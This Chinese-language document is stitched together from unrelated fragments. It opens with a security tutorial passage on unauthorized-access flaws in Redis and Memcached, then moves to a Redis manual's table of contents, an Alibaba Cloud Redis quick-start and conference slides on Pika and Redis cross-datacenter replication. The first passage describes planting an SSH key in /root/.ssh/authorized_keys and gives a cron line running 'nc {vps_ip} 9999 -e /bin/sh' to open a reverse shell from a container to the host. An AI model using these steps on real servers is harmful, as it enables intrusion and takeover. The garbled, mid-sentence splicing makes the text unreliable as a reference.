命令，可以进行写文件 操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件 中，进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。 漏洞利用 环境介绍 环境搭建 常见的未授权访问漏洞： Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 漏洞简介以及危害 Memcached 是一套常用的 key-value 分布式高速缓存系统，由于 Memcached 的安全设计缺陷没 有权限控制模块，所以对公网开放的Memcache服务很容易被攻击者扫描发现，攻击者无需认证通过命 令交互可直接读取 Memcached中的敏感信息。 漏洞利用 环境介绍 环境搭建 64位系统 1.4.4版本：http://static.runoob exec -it a8ff7ed880fb sh # 进入容器 echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务 cat /tmp/root # 查看/tmp/root 文件 exit #退出容器 反弹宿主机shell 还有其他比如写入ssh公钥等利用方式，方式方法都是大同小异的，这里就不再介绍了。

本⽂档及《Redis使⽤⼿册》⼀书中的全部内容版权归机械⼯业出版社所有，受著作权法律保护，任何⼈未经允许 不得将本⽂档及其内容⽤于任何商业⽤途，违者必究。 ⽬录 以下是《Redis使⽤⼿册》⼀书的完整⽬录，其中标题后⾯带 * 的⼤章都在本⽂档提供了试读。 前⾔* 1. 引⾔* 第⼀部分：数据结构与应⽤ 2. 字符串（String）* 3. 散列（Hash）* 4. 列表（List）* 5. 集合（Set）* 和 arg3 则 是命令的参数， ⽽ value1 和 value2 则是可选项的值。 命令描述中的⽅括号 [] 仅⽤于包围命令中可选的参数和选项， 在执⾏命令的时候并不需要给出这些⽅括号。 最 后， 命令描述中的 ... ⽤于表示命令接受任意数量的参数或可选项。 好的， 关于 Redis 命令格式的描述已经⾜够多了， 现在让我们来看⼀个实际的例⼦。 Redis 的 PING 命令接受⼀ 条可选的消息作为参数， Redis 1.0.0 开始可⽤。 2.3 GETSET：获取旧值并设置新值 GETSET 命令就像 GET 命令和 SET 命令的组合版本， 它⾸先获取字符串键⽬前已有的值， 接着为键设置新值， 最 后把之前获取到的旧值返回给⽤户： GETSET key new_value 以下代码展示了如何使⽤ GETSET 命令去获取 number 键的旧值并为它设置新值： redis> GET number

库 Redis 版服务条款》并确认订单信息无误 后，单击去支付进行付款。 云数据库 Redis 版 快速入门 11 进入支付页面，选择支付方式，单击确认支付按钮。支付成功后会提示支付成功。等1-5分钟后进入 控制台即可看见刚才购买的实例。 说明：云数据库 Redis 版在产品行为上与 Redis 一致，当新建一个实例后它会自动生成一些数 据库元信息，因此在 Redis die($redis->getLastError()); } if ($redis->auth($pwd) == false) { die($redis->getLastError()); } /* 认证后就可以进行数据库操作，详情文档参考https://github.com/phpredis/phpredis */ if ($redis->set("foo", "bar") == false) { d #这里替换为实例password pwd = 'test_password' r = redis.StrictRedis(host=host, port=port, password=pwd) #连接建立后就可以进行数据库操作，详情文档参考https://github.com/andymccurdy/redis-py r.set('foo', 'bar'); print r.get('foo') git

按量付费暂不支持。 Redis 4.0 新功能介绍 云数据库 Redis 版 4.0 是以社区 4.0 引擎为基础，合入了大量阿里云开发的特性，并且修复了许多 bug 后全新 推出的售卖版本。除了拥有 Redis 2.8 引擎所具备的所有优势之外，还带来了下面这些新功能。 Lazyfree 云数据库 Redis 版 产品简介 2 Redis 4.0 的 Lazyfree 单副本版本只有一个数据库节点，节点出现故障时，系统会重新拉起一个 Redis 进程（没有数据 ），当节点故障业务自动切换完成后，应用程序需要将数据重新预热，以免对后端数据库产生访问压 力冲击。 注意：由于单副本模式不能提供数据可靠性，节点故障后需要业务进行预热，如果是对数据可靠性要 求较高的敏感性业务，不建议使用单副本版，可选用双副本高可用版。 对 Redis 协议兼容性要求较高的业务 单副本集群版的分片服务器由单节点组成，分片服务器某节点出现故障时，系统会重新拉起一个 redis 进程（没有数据），当节点故障业务自动切换完成后，数据将会丢失，有可能流量被冲击到后 端数据库，需要做好应用程序的预热保护机制。 注意：由于单副本集群不能提供数据可靠性，节点故障后需要业务进行预热，如果是对数据可靠 性要求较高的敏感性业务，不建议使用。 QPS 压力较大 标准版 Redis

• 恢复时间长 – 50G redis 回复时间70分钟 – 同时开启aof 和 rdb SACC2017 Redis 问题 • 一主多从, 主从切换代价大 – 主库挂掉后升级从库, 所有的从库全部重传数 据 SACC2017 Redis 问题 • 缓冲区写满问题 – 内存是昂贵资源, 缓冲区一般设置2G – 网络原因很容易将数据堵死, 那么就会发生大 SET数据结构为主 • 5套30G左右的redis主从，占用300G内存 • 迁移后： • 1套50G左右的pika主从，占用100多G磁盘 SACC2017 Pika 运维 – 案例二 数据分析业务redis迁移到pika 迁移前： 业务数据量增长迅速，上线不到1周数据量增长 到40G 迁移后： 1套100G+ Pika主从 SACC2017 Pika

在实现单元化的部署过程中, 跨数据中 心的数据访问一直是一个业务的痛点. 是否我们也能够有自己的一套 DRC? 来完 成每个站点的单独写入读取, 而不用关心 底层存储的一致性和同步问题. 对此需求进行分析后, 我们决定开发一个 Redis 的 DRC 架构, 来支撑携程集群的应 用单元化部署, 而不仅仅是限制于Redis 数 据的双向同步. Redis For DRC 高可用性 一致性 分区容忍性 Redis B: • set k v 发生在端对端的互相同步过程中 假设有两个 Redis: A 和 B • A 收到客户端的请求: set k v • A 将请求通知到 B • B 收到请求后, 再次通知 A 解决方案: 标记客户端类型 双向回环 client Set k v set k v set k v set k v 复制回环 发生在多个点的互相同步过程 中 与双向回环的不同点在于